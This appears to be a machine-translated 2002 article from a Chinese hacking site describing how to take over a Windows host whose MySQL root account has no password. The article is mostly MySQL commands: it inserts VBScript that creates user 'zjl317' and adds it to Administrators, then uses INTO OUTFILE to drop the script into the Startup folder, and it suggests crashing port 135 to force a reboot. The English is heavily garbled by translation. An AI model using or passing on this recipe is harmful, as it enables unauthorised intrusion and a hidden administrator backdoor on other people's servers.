MYSQL user root password for spatial method of attack |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analyzes>>MYSQL the user root 
                  password for a spatial method of attack  Printing

            MYSQL user root password for a spatial method of attack
            Www.cshu.net  2002-12-16  fog rain village 

              Day before yesterday, I have sent about MYSQL the user ROOT 
              password for spatial pasting, is on-line I also to find some to 
              use this loophole the method, generally is writes ASP or the PHP 
              back door, not only is very troublesome, moreover also must guess 
              the solution website the table of contents, if opposite party has 
              not opened IIS, then our how can it be that not no means? ? 
              Afterwards, own thought deeply about thought means, several which 
              tested in me have this loophole machine center to obtain the 
              success, presently mine method of attack announcement as follows: 
              1st, connects opposite party MYSQL server 
              Mysql -u root -h 192.168.0.1 
              Mysql.exe this procedure has installed MYSQL in you in BIN table 
              of contents 
              2nd, lets us have a look in the server some any databases 
              Mysql>show databases; 
              MYSQL tacitly approves installs when can have MYSQL, the TEST 
              these two databases, if you saw has other databases that is the 
              user from the database which constructs. 
              3rd, lets us enter the database 
              Mysql>use test; 
              We will be able to enter in the test database 
              4th, examined we enter in the database some any data sheets 
              Mysql>show tables; 
              Tacitly approves in situation, in test not any table existence. 
              Below is the key part 
              5th, founds a new table under the TEST database; 
              Mysql>create table a (cmd text); 
              Good, we founded a new table, shows named a, in the table only 
              deposits a field, field named cmd, is the text text. 
              6th, inserts the content in the table 
              Mysql>insert into a values ("set wshshell=createobject 
              (""wscript.shell"")"); 
              Mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 
              zjl317 zjl317 /add" ",0)"); 
              Mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net 
              localgroup Administrators zjl317 /add" ",0)"); 
              The attention double quote and the parenthesis as well as behind 
              "0" certainly must input! We will use these three to order to 
              establish VBS the script procedure! 
              7th, has been good, now we have a look to show in a some any 
              Mysql>select * from a; 
              We will be able to see in the table will have three numbers of 
              lines according to, will be the content which we just input, after 
              confirmed you input the content was unmistakable, we arrived next 
              step 
              8th, the output meter is a VBS script document 
              Mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\" the 
              start "menu \\ procedure \\ starts \\a.vbs"; 
              We show us the content to input to the start group in, is a VBS 
              script document! Attention "\" mark. 
              9th, saw this everybody had definitely known, is outputs the 
              document using MYSQL which may carry out. Why doesn't use BAT, 
              because time start movement can have the obvious DOS window to 
              come out, but may completely hide the window with the VBS script 
              also cannot have the wrong prompt! Originally, after should also 
              have to complete the script automatically to delete this script, 
              but Chinese table of contents really is unable to process, only 
              has relinquishes! Good, looks for a tool to attack 135 to let the 
              service think highly of opens, several minutes later you will be 
              the manager


              Original author: . 
              Origin: . 
              Altogether has 143 readers to read this article 

              [Tells friend] 
            Previous article:The win2000server terminal service brings some 
            tools synopses 

            Next article:Time invades Xiu's multianalysis 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
